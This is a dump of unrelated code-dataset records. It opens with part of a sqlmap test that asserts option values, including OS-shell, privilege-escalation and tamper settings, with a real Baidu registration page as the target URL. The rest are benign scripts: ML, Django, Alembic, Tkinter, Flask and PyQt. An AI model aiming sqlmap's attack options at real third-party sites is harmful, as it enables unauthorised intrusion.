'hexConvert': None,\n 'host': None,\n 'hpp': None,\n 'identifyWaf': None,\n 'ignore401': None,\n 'ignoreProxy': None,\n 'invalidBignum': None,\n 'invalidLogical': None,\n 'invalidString': None,\n 'isDba': None,\n 'keepAlive': None,\n 'lastChar': None,\n 'level': None,\n 'limitStart': None,\n 'limitStop': None,\n 'liveTest': None,\n 'loadCookies': None,\n 'logFile': None,\n 'mnemonics': None,\n 'mobile': None,\n 'msfPath': None,\n 'noCast': None,\n 'noEscape': None,\n 'notString': None,\n 'nullConnection': None,\n 'optimize': None,\n 'os': None,\n 'osBof': None,\n 'osCmd': None,\n 'osPwn': None,\n 'osShell': None,\n 'osSmb': None,\n 'outputDir': None,\n 'pageRank': None,\n 'paramDel': None,\n 'parseErrors': None,\n 'pickledOptions': None,\n 'pivotColumn': None,\n 'predictOutput': None,\n 'prefix': None,\n 'privEsc': None,\n 'profile': None,\n 'proxy': None,\n 'proxyCred': None,\n 'proxyFile': None,\n 'purgeOutput': None,\n 'query': None,\n 'rFile': None,\n 'rParam': None,\n 'randomAgent': None,\n 'referer': None,\n 'regAdd': None,\n 'regData': None,\n 'regDel': None,\n 'regKey': None,\n 'regRead': None,\n 'regType': None,\n 'regVal': None,\n 'regexp': None,\n 'requestFile': None,\n 'retries': None,\n 'risk': None,\n 'runCase': None,\n 'saFreq': None,\n 'safUrl': None,\n 'saveCmdline': None,\n 'scope': None,\n 'search': None,\n 'secondOrder': None,\n 'sessionFile': None,\n 'shLib': None,\n 
'showVersion': None,\n 'sitemapUrl': None,\n 'skip': None,\n 'skipUrlEncode': None,\n 'smart': None,\n 'smokeTest': None,\n 'sqlFile': None,\n 'sqlShell': None,\n 'sqlmapShell': None,\n 'stopFail': None,\n 'string': None,\n 'suffix': None,\n 'tamper': None,\n 'tbl': None,\n 'tech': None,\n 'testFilter': None,\n 'testParameter': None,\n 'textOnly': None,\n 'threads': None,\n 'timeSec': None,\n 'timeout': None,\n 'titles': None,\n 'tmpPath': None,\n 'tor': None,\n 'torPort': None,\n 'torType': None,\n 'trafficFile': None,\n 'uChar': None,\n 'uCols': None,\n 'uFrom': None,\n 'udfInject': None,\n 'updateAll': None,\n 'url': u'https://passport.baidu.com/v2/?reg&tpl=tb&u=http://tieba.baidu.com',\n 'user': None,\n 'verbose': None,\n 'wFile': None,\n 'wizard': None}, cmdLineOptions)\n self.assertDictEqual({'authPassword': None,\n 'authUsername': None,\n 'boundaries': [],\n 'cj': None,\n 'dbmsConnector': None,\n 'dbmsHandler': None,\n 'dnsServer': None,\n 'dumpPath': None,\n 'hashDB': None,\n 'hashDBFile': None,\n 'hostname': None,\n 'httpHeaders': [],\n 'ipv6': False,\n 'multipleTargets': False,\n 'outputPath': None,\n 'paramDict': {},\n 'parameters': {},\n 'path': None,\n 'port': None,\n 'proxyList': [],\n 'resultsFP': None,\n 'resultsFilename': None,\n 'scheme': None,\n 'tests': [],\n 'trafficFP': None,\n 'wFileType': None}, conf)\n # https://docs.python.org/2/howto/logging.html?highlight=logger#logging-howto\n def test_logger(self):\n self.assertEqual(['__class__', '__delattr__', '__dict__', '__doc__',\n '__format__', '__getattribute__', '__hash__', '__init__',\n '__module__', '__new__', '__reduce__', '__reduce_ex__',\n '__repr__', '__setattr__', '__sizeof__', '__str__',\n '__subclasshook__', '__weakref__', '_log', 'addFilter',\n 'addHandler', 'callHandlers', 'critical', 'debug',\n 'disabled', 'error', 'exception', 'fatal', 'filter',\n 'filters', 'findCaller', 'getChild', 'getEffectiveLevel',\n 'handle', 'handlers', 'info', 'isEnabledFor', 'level', 'log',\n 'makeRecord', 'manager', 'name', 'parent', 'propagate',\n 'removeFilter', 'removeHandler', 'root', 'setLevel', 'warn',\n 'warning'], dir(logger))\n logger.debug(\"DEBUG message goes\")\n logger.info(\"INFO message goes\")\n self.assertEqual(False, logger == logger.root)\n self.assertEqual(\"sqlmapLog\", logger.name)\n self.assertEqual(30, logger.level)\n self.assertEqual(30, logger.getEffectiveLevel())\n self.assertEqual(False, logger.isEnabledFor(29))\n self.assertEqual(True, logger.isEnabledFor(31))\n self.assertEqual(1, logger.propagate)\n # logging.Manager\n self.assertEqual(['__class__', '__delattr__', '__dict__', '__doc__',\n '__format__', '__getattribute__', '__hash__', '__init__',\n '__module__', '__new__', '__reduce__', '__reduce_ex__',\n '__repr__', '__setattr__', '__sizeof__', '__str__',\n '__subclasshook__', '__weakref__', '_fixupChildren',\n '_fixupParents', 'disable', 'emittedNoHandlerWarning',\n 'getLogger', 'loggerClass', 'loggerDict', 'root', 'setLoggerClass'],\n dir(logger.manager))\n self.assertEqual(True, logger.manager.loggerDict['sqlmapLog'] == logger)\n self.assertEqual(30, logger.manager.loggerDict['ClientForm'].getEffectiveLevel())\n self.assertEqual(0, logger.manager.loggerDict['ClientForm'].level)\n self.assertEqual(False, logger.manager.loggerDict['ClientForm'] == logger.root)\n # logging.filters\n self.assertEqual([], logger.filters)\n # ColorizingStreamHandler\n from thirdparty.ansistrm.ansistrm import ColorizingStreamHandler\n self.assertEqual(['__class__', '__delattr__', '__dict__', '__doc__',\n '__format__', 
'__getattribute__', '__hash__', '__init__',\n '__module__', '__new__', '__reduce__', '__reduce_ex__',\n '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__',\n '__weakref__', '_name', 'acquire', 'addFilter', 'close',\n 'color_map','colorize', 'createLock', 'csi', 'disable_coloring',\n 'emit', 'filter','filters', 'flush', 'format', 'formatter',\n 'get_name', 'handle', 'handleError', 'is_tty', 'level',\n 'level_map', 'lock', 'name', 'output_colorized', 'release',\n 'removeFilter', 'reset', 'setFormatter', 'setLevel',\n 'set_name', 'stream'], dir(logger.handlers[0]))\n self.assertEqual(True, logger.handlers[0].is_tty)\n # CRITICAL = 50\n # FATAL = CRITICAL\n # ERROR = 40\n # WARNING = 30 --default\n # WARN = WARNING\n # INFO = 20\n # DEBUG = 10\n # NOTSET = 0\n # LOGGER_HANDLER.level_map[logging.getLevelName(\"PAYLOAD\")] = (None, \"cyan\", False)\n # LOGGER_HANDLER.level_map[logging.getLevelName(\"TRAFFIC OUT\")] = (None, \"magenta\", False)\n # LOGGER_HANDLER.level_map[logging.getLevelName(\"TRAFFIC IN\")] = (\"magenta\", None, False)\n self.assertEqual({7: ('magenta', None, False),\n 40: (None, 'red', False),\n 9: (None, 'cyan', False),\n 10: (None, 'blue', False),\n 8: (None, 'magenta', False),\n 50: ('red', 'white', False),\n 20: (None, 'green', False),\n 30: (None, 'yellow', False)},\n logger.handlers[0].level_map)\n","sub_path":"test/koans/about_data.py","file_name":"about_data.py","file_ext":"py","file_size_in_byte":19848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"483985169","text":"# **************************************************************************** #\n# #\n# ::: :::::::: #\n# boards.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: jcruz-y- +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2019/02/26 19:19:52 by jcruz-y- #+# #+# #\n# Updated: 2019/02/27 18:56:14 by jcruz-y- ### ########.fr #\n# #\n# **************************************************************************** #\n\nimport random\nimport numpy as np\nimport src.game_b as game\n\n#r = random.randint(3, 1000)\n#c = random.randint(3, 1000)\n#l = random.randint(1, r/2) \n#minim_max = l * 2 \n#h = random.randint(minim_max, r)\n#R = 20\n#C = 20\nH = 6\nL = 2\n\nACTIONS = [\"right\", \"down\", \"left\", \"up\", \"cut_right\", \"cut_down\", \"cut_up\", \"cut_left\"]\n\ndef preprocess(state_dict):\n cursor_map = np.zeros(np.array(state_dict['ingredients_map']).shape)\n #flat_ing_map = np.array(state_dict['ingredients_map']).ravel()\n #ing_map_len = len(flat_ing_map)\n #ing_map_flat_extended = flat_ing_map + np.zeros(1000000 - ing_map_len)\n cursor_map[state_dict['cursor_position']] = 1\n state = np.concatenate((\n np.array(state_dict['ingredients_map']).ravel(),\n #ing_map_flat_extended,\n np.array(state_dict['slices_map']).ravel(),\n cursor_map.ravel(),\n [state_dict['slice_mode'],\n state_dict['min_each_ingredient_per_slice'],\n state_dict['max_ingredients_per_slice']],\n\t))\n return state.astype(np.float).ravel()\n\ndef rand_pizza(r, c):\n #h = random.randint(2, (r * c) // 5)\n #l = random.randint(1, 3)\n #r = random.randint(2, 1000)\n #c = random.randint(2, 1000)\n l = random.randint(1, r/2) \n minim_max = l * 2\n h = random.randint(minim_max, r)\n ing = ['T', 'M']\n pizza = []\n for _ in range(r):\n ls = []\n for _ in range(c):\n ls.append(ing[random.randint(0,1)])\n pizza.append(''.join(ls))\n return {'pizza_lines' : pizza, 'r' : r, 'c' : c, 'l' : l, 'h' : h}\n\n\ndef run_validation(PG, steps):\n env = game.Game({'max_steps': steps})\n R = 6\n 
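# fixed 6x7 validation board matching the hard-coded pizza_lines below\n    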
C = 7\n h = 6\n l = 2\n pizza_lines = [\"TMMMTTT\",\"MMMMTMM\", \"TTMTTMT\", \"TMMTMMM\", \"TTTTTTM\", \"TTTTTTM\"]\n #pizza_lines = [\"TMTMTMT\",\"MTMTMTM\", \"TMTMTMT\", \"MTMTMTM\", \"TMTMTMT\", \"MTMTMTM\",\"TMTMTMT\"]\n pizza_config = {'pizza_lines': pizza_lines, 'r': R, 'c': C, 'l': l, 'h': h}\n state = env.init(pizza_config)[0] # np.zeros(OBSERVATION_DIM) #get only first value of tuple\n done = False\n acts = []\n for step in range(steps):\n state = preprocess(state)\n # 1. Choose an action based on observation\n action = PG.choose_action(state)\n\n # 2. Take action in the environment\n state_, reward, done, info = env.step(ACTIONS[action])\n acts.append(ACTIONS[action])\n state = state_\n print(acts)\n env.render()\n #game ends\n\n\n","sub_path":"pg_generic/boards.py","file_name":"boards.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"83375357","text":"import subprocess as sp\nimport os, os.path, sys\n\ndef evaluate(csv,w):\n if os.path.isfile(csv) & csv.endswith('.csv'):\n output = sp.check_output(['./a.out', csv, w])\n state_predicted = output.strip().split('\\n')[-1]\n print (state_predicted)\n\nif __name__ == '__main__':\n if len(sys.argv) == 3:\n evaluate(sys.argv[1], sys.argv[2])","sub_path":"evaluateCsv.py","file_name":"evaluateCsv.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"17520891","text":"import tensorflow as tf\n\nclass Model():\n def __init__(self, learning_rate, mnist, sess):\n self.sess = sess\n self.mnist = mnist\n self.x = tf.placeholder(tf.float32, [None, 784])\n W = tf.Variable(tf.zeros([784, 10]))\n b = tf.Variable(tf.zeros([10]))\n self.y = tf.nn.softmax(tf.matmul(self.x, W) + b)\n self.y_ = tf.placeholder(tf.float32, [None, 10])\n self.cross_entropy = tf.reduce_mean(\n -tf.reduce_sum(self.y_ * tf.log(self.y), reduction_indices=[1]))\n self.train_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(self.cross_entropy)\n correct_prediction = tf.equal(tf.argmax(self.y, 1), tf.argmax(self.y_, 1))\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n self.test_sum_cross_entropy = tf.summary.scalar(\"test.cross_entropy\",\n self.cross_entropy)\n self.test_sum_acc = tf.summary.scalar(\"test.accuracy\", self.accuracy)\n tf.global_variables_initializer().run()\n\n def train(self, minibatch_size):\n mnist = self.mnist\n batch_xs, batch_ys = mnist.train.next_batch(minibatch_size)\n # take a train step:\n self.sess.run(self.train_step, feed_dict={self.x: batch_xs,\n self.y_: batch_ys})","sub_path":"papers/klaus_greff/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"365784580","text":"from drf_yasg.utils import swagger_auto_schema\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom .exceptions import UserDoesNotExist, NegativePoints, ZeroPoints\nfrom .models import Balance\nfrom .serializers import BalanceSerializer\n\n\nclass Balances(APIView):\n \"\"\"Increase or decrease user points\"\"\"\n @swagger_auto_schema(request_body=BalanceSerializer(), responses={201: 'Success.'})\n def post(self, request, format=None):\n serializer = BalanceSerializer(data=request.data)\n\n if serializer.is_valid():\n user_id = request.data.get('user_id')\n points = 
request.data.get('points')\n\n if points < 0:\n balance = Balance.objects.points_sum(user_id=user_id)\n # Check if residual balance negative\n if balance is None:\n raise UserDoesNotExist()\n if (balance + points) < 0:\n raise NegativePoints()\n serializer.save()\n elif points == 0:\n raise ZeroPoints()\n else:\n # If incoming points are positive, simply store them\n serializer.save()\n return Response({'detail': \"Success.\"}, status=201)\n else:\n return Response(serializer.errors, status=400)\n\n\nclass UserBalance(APIView):\n \"\"\"Return user balance by user_id\"\"\"\n def get(self, request, user_id, format=None):\n balance = Balance.objects.points_sum(user_id=user_id)\n\n if balance and balance >= 0:\n jdata = {'balance': balance}\n return Response(jdata, status=200)\n else:\n raise UserDoesNotExist()\n","sub_path":"services/balances/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"106062453","text":"# Copyright 2018 OpenStack Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\n\"\"\"Update tenant_id type from uuid to text\n\nRevision ID: 644faa4491fd\nRevises: 4da82e1c11c8\nCreate Date: 2018-10-29 17:25:37.901136\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '644faa4491fd'\ndown_revision = '4da82e1c11c8'\n\nfrom alembic import op # noqa: E402\nimport sqlalchemy as sa # noqa: E402\n\n\nCONSTRAINT_MAP = {\n 'hashmap_mappings': {\n 'uniq_field_mapping': (\n ['value', 'field_id', 'tenant_id'],\n ['value', 'field_id']),\n 'uniq_service_mapping': (\n ['value', 'service_id', 'tenant_id'],\n ['value', 'service_id'])},\n 'hashmap_thresholds': {\n 'uniq_field_threshold': (\n ['level', 'field_id', 'tenant_id'],\n ['level', 'field_id']),\n 'uniq_service_threshold': (\n ['level', 'service_id', 'tenant_id'],\n ['level', 'service_id'])}}\n\n\ndef get_reflect(table):\n reflect_args = [\n sa.Column(\n 'service_id',\n sa.Integer,\n sa.ForeignKey(\n 'hashmap_services.id',\n ondelete='CASCADE',\n name='fk_{}_service_id_hashmap_services'.format(table)),\n nullable=True),\n sa.Column(\n 'field_id',\n sa.Integer,\n sa.ForeignKey(\n 'hashmap_fields.id',\n ondelete='CASCADE',\n name='fk_{}_field_id_hashmap_fields'.format(table)),\n nullable=True),\n sa.Column(\n 'group_id',\n sa.Integer,\n sa.ForeignKey(\n 'hashmap_groups.id',\n ondelete='SET NULL',\n name='fk_{}_group_id_hashmap_groups'.format(table)),\n nullable=True),\n sa.Column(\n 'map_type',\n sa.Enum(\n 'flat',\n 'rate',\n name='enum_{}map_type'.format(\n 'hash' if table == 'hashmap_thresholds' else ''),\n create_constraint=True),\n nullable=False)]\n return reflect_args\n\n\ndef upgrade():\n for table in ('hashmap_mappings', 'hashmap_thresholds'):\n with op.batch_alter_table(\n table,\n reflect_args=get_reflect(table)\n ) as batch_op:\n batch_op.alter_column('tenant_id',\n type_=sa.String(length=255),\n existing_nullable=True)\n for name, columns in CONSTRAINT_MAP[table].items():\n 
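# recreate each unique constraint so its key also covers tenant_id\n                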
batch_op.drop_constraint(name, type_='unique')\n                batch_op.create_unique_constraint(name, columns[0])\n","sub_path":"cloudkitty/rating/hash/db/sqlalchemy/alembic/versions/644faa4491fd_update_tenant_id_type_from_uuid_to_text.py","file_name":"644faa4491fd_update_tenant_id_type_from_uuid_to_text.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"}
{"seq_id":"582395560","text":"#!/usr/bin/python\r\n# -*- coding: UTF-8 -*-\r\n\r\nimport re\r\n\r\n# Split the text into sentences\r\ndef splitSentence(paragraph):\r\n    #tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\r\n    sentences = paragraph.split(\"\\n\")\r\n    return sentences\r\n\r\nf1 = open ('京华烟云.txt', 'r',encoding='utf-8')\r\nstr1 = f1.read()\r\nsentences = splitSentence(str1)\r\nf1.close ()\r\n\r\nfor sentence in sentences:\r\n    if ((\"木兰\" in sentence) and (\"荪亚\" in sentence) and (\"“\" in sentence)):\r\n        a = sentence.find(\"木兰\")\r\n        b = sentence.find(\"荪亚\")\r\n        c = sentence.find(\"“\")\r\n        if (a < c and b < c):\r\n            if (c - min(a,b) < 20):\r\n                print (sentence)\r\n\r\n\r\n","sub_path":"simple/novel.py","file_name":"novel.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"}
{"seq_id":"397433099","text":"#!/usr/bin/env python\nimport rospy\nfrom gazebo_msgs.msg import ModelState\nfrom geometry_msgs.msg import Pose \n\nx = -1.367482\ny = 9.310670\nz = 0.449995\n\ncurrent_x = 0.858947\ncurrent_y = 5.998969\ncurrent_z = 0.449984\n\ntarget_model_name = \"husky\"\nrospy.init_node(\"p2p_move\", anonymous=True)\npub = rospy.Publisher(\"/gazebo/set_model_state\", ModelState, queue_size=10)","sub_path":"scripts/move_ugv_demo.py","file_name":"move_ugv_demo.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"}
{"seq_id":"129925250","text":"#import tkinter as tk\n#import Canvas\nimport random\nimport matplotlib.pyplot as plt \nimport tkinter as tk\nimport tkinter.messagebox\nimport numpy as np\n#import pygame\n#import tkinter as tk\n\nfrom matrix2 import *\nfrom risk_simulator import *\nfrom time_pass import *\n#def getBattles():\n#\tattacker=7\n\n#\tdefender=6\n\n#\tno_of_battles=0\n\n#\twhile (attacker!=0 and defender!=0):\n#\t\taturn = random.choice([1,2,3,4,5,6])\n#\t\tdturn = random.choice([1,2,3,4,5,6])\n#\t\tif aturn>dturn:\n#\t\t\tdefender=defender-1\n#\t\telse:\n#\t\t\tattacker=attacker-1\n#\t\tno_of_battles=no_of_battles+1\n\n#\tif(attacker==0):\n#\t\treturn no_of_battles,0,1\n#\telse:\n#\t\treturn no_of_battles,1,0\n\n\ndef plotter():\n\tif inp.get()=='':\n\t\ttkinter.messagebox.showerror(\"Error\",\"Please enter No of Iterations!!!!\")\n\t\treturn\n\tprint(inp.get())\n\tprint(type(inp.get()))\n\n\tif inpa.get()=='':\n\t\ttkinter.messagebox.showerror(\"Error\",\"Please enter No of Attackers!!!!\")\n\t\treturn\n\tif inpd.get()=='':\n\t\ttkinter.messagebox.showerror(\"Error\",\"Please enter No of Defenders!!!!\")\n\t\treturn\n\n\tmax_no_of_iterations=inp.get()\n\tattack=inpa.get()\n\tdefend=inpd.get()\n\n\tattack=int(attack)\n\tdefend=int(defend)\n\tmax_no_of_iterations=int(max_no_of_iterations)\n\tx=[]\n\ty=[]\n\tfor i in range(1,max_no_of_iterations+1,1):\n\t\tans=0\n\t\tfor j in range(1,i+1,1):\n\t\t\tnum,a,d=getBattles(attack,defend)\n\t\t\tans=ans+num\n\t\tans=float(ans)/i\n\t\tx.append(i)\n\t\ty.append(ans)\n    # plotting the points \n\tnum,v,b=theoretical_dynamic(attack,defend)\n\tplt.plot(x, y , label = 'Simulated no. 
of battles')\n\t#plt.legend(['Simulated no. of battles']) \n\tplt.axhline(y=num, color='r', linestyle='-',label=\"Theoretical battles\")\n\tleg = plt.legend();\n\t# naming the x axis \n\tplt.xlabel('NO OF ITERATIONS') \n\t# naming the y axis \n\tplt.ylabel('SIMULATED BATTLES') \n\n\t# giving a title to my graph \n\tplt.title('SIMULATED BATTLES V/S NO OF ITERATIONS')\n\t# function to show the plot \n\tplt.show()\n\n\n#print(getBattles())\n\ndef plotter1():\n\tif inp1.get()=='':\n\t\ttkMessageBox.showerror(\"Error\",\"Please enter No of Iterations!!!!\")\n\t\treturn\n\tprint(inp1.get())\n\tprint(type(inp1.get()))\n\tif inpa.get()=='':\n\t\ttkMessageBox.showerror(\"Error\",\"Please enter No of Attackers!!!!\")\n\t\treturn\n\tif inpd.get()=='':\n\t\ttkMessageBox.showerror(\"Error\",\"Please enter No of Defenders!!!!\")\n\t\treturn\n\tmax_no_of_iterations=inp1.get()\n\tmax_no_of_iterations=int(max_no_of_iterations)\n\n\tattack=inpa.get()\n\tdefend=inpd.get()\n\tattack=int(attack)\n\tdefend=int(defend)\n\tx=[]\n\ty1=[]\n\ty2=[]\n\tfor i in range(1,max_no_of_iterations+1,1):\n\t\tans=0\n\t\tawin=0\n\t\tbwin=0\n\t\tfor j in range(1,i,1):\n\t\t\tres,a,d=getBattles(attack,defend)\n\t\t\tans=ans+res\n\t\t\tawin=awin+a\n\t\t\tbwin=bwin+d\n\t\tx.append(i)\n\t\ty1.append(float(awin)/i)\n\t\ty2.append(float(bwin)/i)\n\t\n\tnum,v,b=theoretical_dynamic(attack,defend)\n\tplt.plot(x, y1 , label = 'Attacker Probability')\n\t#plt.legend(['Attacker Probability'])\n\tplt.plot(x, y2 , label = 'Defender Probability') \n\t#plt.legend(['Defender Probability'])\n\tplt.axhline(y=v, color='k', linestyle='--',label=\"Theoretical attacker win Probability\")\n\tplt.axhline(y=b, color='r', linestyle='--',label=\"Theoretical defender win Probability\")\n\tleg = plt.legend();\n\t# naming the x axis \n\tplt.xlabel('NO OF ITERATIONS') \n\t# naming the y axis \n\tplt.ylabel('SIMULATED PROBABILITIES') \n\n\t# giving a title to my graph \n\tplt.title('SIMULATED PROBABILITIES V/S NO OF ITERATIONS')\n\tplt.legend\n\t# function to show the plot \n\tplt.show()\n\n\nroot = tk.Tk()\nlogo = tk.PhotoImage(file=\"risk_image.gif\")\nlogo=logo.subsample(3)\nw1 = tk.Label(root, image=logo).pack(side=\"top\")\nroot.title(\"Risk Simulator\")\nroot.geometry(\"600x500\")\ntextbox=\"No of simulations:\"\n\nans,prob_attackers,prob_defender=theoretical_values()\n\ntb1 = \"\"\"Expected number of battles(theoretical):\"\"\" + str(ans)\n#print(\"Expected number of steps simulated:\"+str(num))\n\ntb2=\"Enter number of simulations:\"\n\n\ntb3=\"Enter number of iterations for Probability:\"\n\ntb4=\"Enter no. of attackers:\"\n\ntb5=\"Enter no. 
of defenders:\"\n\nwa = tk.Label(root, \n justify=tk.LEFT,\n padx = 10, \n text=tb4,fg=\"green\",font=2).place(x=10,y=250)\ninpa=tk.StringVar()\nea = tk.Entry(root,textvariable=inpa,width=4).place(x=200,y=250)\n\n\nwd = tk.Label(root, \n justify=tk.LEFT,\n padx = 10, \n text=tb5,fg=\"green\",font=2).place(x=250,y=250)\ninpd=tk.StringVar()\ned = tk.Entry(root,textvariable=inpd,width=4).place(x=450,y=250)\n\n\n#wtext = tk.Label(root, \n # justify=tk.LEFT,\n # padx = 10, \n # text=tb1,fg=\"blue\",font=2).place(x=10,y=290)\n\nwtext1 = tk.Label(root, \n justify=tk.LEFT,\n padx = 10, \n text=tb2,fg=\"red\",font=2).place(x=10,y=330)\n\ninp=tk.StringVar()\ne1 = tk.Entry(root,textvariable=inp,width=8).place(x=270,y=330)\n\n\nplot_getter = tk.Button(root, text=\"Get Plot\", command=plotter).place(x=350,y=330) \n\n\nwtextw = tk.Label(root, \n justify=tk.LEFT,\n padx = 10, \n text=tb3,fg=\"orange\",font=2).place(x=10,y=400)\n\ninp1=tk.StringVar()\ne2 = tk.Entry(root,textvariable=inp1,width=8).place(x=370,y=400)\n\n\nplot_getter1 = tk.Button(root, text=\"Plot Probability\", command=plotter1).place(x=450,y=400)\n\n\nroot.mainloop()","sub_path":"Risk/risk.py","file_name":"risk.py","file_ext":"py","file_size_in_byte":5133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"58965821","text":"import json\nimport logging\nimport logging.config\nfrom datetime import datetime\n\nimport boto3\nimport watchtower\n\nimport etl.monitor\nfrom etl.config import get_config_value\nfrom etl.logs.formatter import JsonFormatter\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n\ndef add_cloudwatch_logging(prefix) -> None:\n session = boto3.session.Session()\n log_group = get_config_value(\"arthur_settings.logging.cloudwatch.log_group\")\n now = datetime.utcnow()\n stream_name = f\"{prefix}/{now.year}/{now.month}/{now.day}/{etl.monitor.Monitor.etl_id}\"\n\n logger.info(f\"Starting logging to CloudWatch stream '{log_group}/{stream_name}'\")\n handler = watchtower.CloudWatchLogHandler(\n boto3_session=session,\n log_group=log_group,\n log_group_retention_days=180,\n send_interval=10,\n stream_name=stream_name,\n )\n\n log_level = get_config_value(\"arthur_settings.logging.cloudwatch.log_level\")\n handler.setLevel(log_level)\n # The extra \"str()\" gets around the meta class approach to store the etl_id.\n handler.setFormatter(JsonFormatter(prefix, str(etl.monitor.Monitor.etl_id)))\n\n root_logger = logging.getLogger()\n root_logger.addHandler(handler)\n\n\ndef tail(prefix: str, start_time: datetime) -> None:\n client = boto3.client(\"logs\")\n log_group = get_config_value(\"arthur_settings.logging.cloudwatch.log_group\")\n logger.info(f\"Searching log streams '{log_group}/{prefix}/*' (starting at '{start_time})'\")\n\n paginator = client.get_paginator(\"filter_log_events\")\n response_iterator = paginator.paginate(\n logGroupName=log_group,\n logStreamNamePrefix=prefix,\n startTime=int(start_time.timestamp() * 1000.0),\n )\n for response in response_iterator:\n for event in response[\"events\"]:\n stream_name = event[\"logStreamName\"]\n message = json.loads(event[\"message\"])\n print(f\"{stream_name} {message['gmtime']} {message['log_level']} {message['message']}\")\n","sub_path":"python/etl/logs/cloudwatch.py","file_name":"cloudwatch.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"171444830","text":"from app import app\nfrom flask 
import (request, g, render_template)\n\nimport ranker\nimport nextbus.nextbus as nextbus\nimport socket\nimport traceback\n\n@app.route('/', methods=['GET', 'POST'])\ndef pathfinder():\n\tuse_socket = False\n\tg.pathfinder_done = None;\n\tg.valid_out = None;\n\tif request.method == 'POST':\n\t\tg.pathfinder_done = 1\n\n\t\torigin = request.form['origin']\n\t\tdest = request.form['dest']\n\t\tdepart_in = request.form['minleaving']\n\t\twalk_speed = request.form['walkspeed']\n\n\t\tif use_socket:\n\t\t\thost = 'localhost'\n\t\t\tport = 9876\n\t\t\tbufsize = 4096\n\n\t\t\ttry:\n\t\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\t\t\ts.connect((host, port))\n\t\t\t\ts.sendall(\"%s\\n%s\\n%s\\n%s\" % (origin, dest, depart_in, walk_speed))\n\t\t\t\tresult = s.recv(bufsize)\n\t\t\texcept Exception:\n\t\t\t\ttraceback.print_exc()\n\t\t\t\tresult = \"Error getting results from pathfinder VM\"\n\n\t\telse:\n\t\t\tresult = ranker.pathRanker(origin, dest, float(depart_in)*60, float(walk_speed))\n\n\t\tif (result != ranker.INVALID_REQUEST):\n\t\t\tg.valid_out = 1\n\t\t\twaypoints = result.split(\";\")\n\t\t\tresult = waypoints.pop(0)\n\t\t\tresult = result.replace(\"\\n\", \"\\n    \")\n\t\t\tg.direction_string = \"&origin=\" + origin.replace(\" \", \"+\") + \"&destination=\" + dest.replace(\" \", \"+\")\n\t\t\tg.waypoints_string = \"&waypoints=\"\n\t\t\tfor waypoint in waypoints:\n\t\t\t\tif waypoint != waypoints[0]:\n\t\t\t\t\tg.waypoints_string += \"|\"\n\t\t\t\tg.waypoints_string += waypoint.replace(\" \", \"+\")\n\t\t# append TTC service alert\n\t\talert = nextbus.Alert.getAlerts().replace(\"\\n\", \"\\n    \")\n\t\tg.pathfinder_out = result + '\\n\\n    Service Alerts:\\n
    ' + alert\n\n\treturn render_template('index.html')\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"255822879","text":"\"\"\"\nTask Monitor window\n\nBrowses:\n - Running agents, allowing to reinitiate or finish an agent execution\n - Threads, browsing only\n\n\"\"\"\n\n__all__ = [\"XTPMonitor\"]\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport os\nimport ui_XTPMonitor\nfrom alavan.misc import fileutil\nfrom alavan import misc\nfrom alavan import mainSys\n\n\ntry:\n _fromUtf8 = QString.fromUtf8\nexcept AttributeError:\n _fromUtf8 = lambda s: s\n\n\nM_PROCESS = 0\nM_THREAD = 1\n\nclass XTPMonitor(QMainWindow, ui_XTPMonitor.Ui_XTPMonitor):\n def __init__(self, parent=None):\n QMainWindow.__init__(self, parent)\n self.setupUi(self)\n self.InitializeUI0()\n\n self.currentProcess = None\n self.currentThread = None\n #self.resize(1, 1) # As small as possible!\n\n\n def InitializeUI0(self):\n\n a = [self.tableWidgetProcess, self.tableWidgetThread]\n for t in a:\n t.setAlternatingRowColors(True)\n t.setEditTriggers(QTableWidget.NoEditTriggers)\n\n self.fileObserver = fileutil.FileObserver()\n self.fileObserver.minInterval = 0.25\n self.fileObserver.FileChanged.connect(self.on_FileChanged, Qt.QueuedConnection)\n self.fileObserver.start()\n\n mainSys().pm.WorkersChanged.connect(self.on_ProcessesChanged, 